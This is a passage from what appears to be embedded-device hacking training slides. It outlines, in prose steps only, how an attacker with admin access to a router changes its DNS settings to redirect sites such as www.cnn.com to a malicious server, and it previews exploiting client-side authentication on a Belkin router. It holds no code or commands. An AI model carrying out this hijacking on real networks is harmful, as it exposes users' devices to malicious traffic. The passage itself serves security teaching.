Step 2: Elevates privileges to admin
Step 3: Changes DNS settings on router
Step 4: Router now talks to hacker’s server to resolve name address
Step 5: www.cnn.com now resolves to an IP address of hacker’s server
Step 6: Hacker provides malicious traffic to devices on the network
Step 7: Pwned
![Page 173: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/173.jpg)
Conclusion
In this session, we were able to obtain initial remote access to the target device
The next step is to elevate our privileges on the target to that of an administrator.
This device uses client side authentication for admin privileges, which we will exploit in Session II
Session III will be focused on utilizing admin privileges from Session II to compromise a Windows 7 device connected to the Belkin router